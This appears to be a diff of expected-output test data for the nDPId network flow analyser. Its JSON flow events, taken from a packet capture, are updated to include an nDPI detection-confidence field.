 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136439,"flow_last_seen":1467353136440,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.249.53.196","src_port":22793,"dst_port":32443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191500,"flow_last_seen":1467353191505,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":439,"flow_tot_l4_payload_len":583,"flow_avg_l4_payload_len":291,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1467353191521,"flow_last_seen":1467353191606,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":476,"flow_tot_l4_payload_len":2480,"flow_avg_l4_payload_len":310,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191604,"flow_last_seen":1467353191608,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00657{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":529,"flow_first_seen":1467353196856,"flow_last_seen":1467353197680,"flow_idle_time":7440000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":664395,"flow_avg_l4_payload_len":1255,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00657{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":542,"flow_first_seen":1467353198532,"flow_last_seen":1467353199507,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":681117,"flow_avg_l4_payload_len":1256,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191500,"flow_last_seen":1467353191505,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":439,"flow_tot_l4_payload_len":583,"flow_avg_l4_payload_len":291,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1467353191521,"flow_last_seen":1467353191606,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":476,"flow_tot_l4_payload_len":2480,"flow_avg_l4_payload_len":310,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191604,"flow_last_seen":1467353191608,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":529,"flow_first_seen":1467353196856,"flow_last_seen":1467353197680,"flow_idle_time":7440000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":664395,"flow_avg_l4_payload_len":1255,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":542,"flow_first_seen":1467353198532,"flow_last_seen":1467353199507,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":681117,"flow_avg_l4_payload_len":1256,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353200271,"flow_last_seen":1467353200271,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50781,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353190168,"flow_last_seen":1467353190235,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50295,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353190168,"flow_last_seen":1467353190235,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50295,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353190168,"flow_last_seen":1467353190235,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50295,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00631{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":338,"flow_first_seen":1467353136439,"flow_last_seen":1467353136982,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":124558,"flow_avg_l4_payload_len":368,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.42.0.158","src_port":22793,"dst_port":7716,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353187172,"flow_last_seen":1467353202194,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":798,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.28","dst_ip":"239.255.255.250","src_port":60023,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353187172,"flow_last_seen":1467353202194,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":798,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.28","dst_ip":"239.255.255.250","src_port":60023,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.44.171.1","src_port":22793,"dst_port":29702,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.44.171.1","src_port":22793,"dst_port":29702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353156959,"flow_last_seen":1467353156998,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":376,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":287,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353157063,"flow_last_seen":1467353157103,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":425,"flow_tot_l4_payload_len":728,"flow_avg_l4_payload_len":364,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191688,"flow_last_seen":1467353191722,"flow_idle_time":7440000,"flow_min_l4_payload_len":237,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":787,"flow_avg_l4_payload_len":393,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353156959,"flow_last_seen":1467353156998,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":376,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":287,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353157063,"flow_last_seen":1467353157103,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":425,"flow_tot_l4_payload_len":728,"flow_avg_l4_payload_len":364,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191688,"flow_last_seen":1467353191722,"flow_idle_time":7440000,"flow_min_l4_payload_len":237,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":787,"flow_avg_l4_payload_len":393,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
 00631{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1467353136439,"flow_last_seen":1467353136982,"flow_idle_time":180000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1083,"flow_tot_l4_payload_len":10732,"flow_avg_l4_payload_len":268,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.197.138.12","src_port":22793,"dst_port":6956,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00631{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":101,"flow_first_seen":1467353136433,"flow_last_seen":1467353136982,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":34577,"flow_avg_l4_payload_len":342,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"118.171.15.56","dst_ip":"192.168.115.8","src_port":5544,"dst_port":22793,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
-00607{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136616,"flow_last_seen":1467353136617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50462,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136616,"flow_last_seen":1467353136617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50462,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00569{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136616,"flow_last_seen":1467353136617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50462,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139505,"flow_last_seen":1467353139595,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":720,"flow_avg_l4_payload_len":360,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139627,"flow_last_seen":1467353139779,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":332,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139662,"flow_last_seen":1467353139771,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":255,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1467353139819,"flow_last_seen":1467353142600,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":2080,"flow_avg_l4_payload_len":520,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140709,"flow_last_seen":1467353140888,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":517,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140628,"flow_last_seen":1467353140677,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1186,"flow_avg_l4_payload_len":593,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140655,"flow_last_seen":1467353140720,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":1032,"flow_avg_l4_payload_len":516,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353141138,"flow_last_seen":1467353141308,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":705,"flow_avg_l4_payload_len":352,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353147705,"flow_last_seen":1467353147794,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":254,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353147927,"flow_last_seen":1467353148016,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":356,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353150114,"flow_last_seen":1467353150272,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1038,"flow_avg_l4_payload_len":519,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139505,"flow_last_seen":1467353139595,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":720,"flow_avg_l4_payload_len":360,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
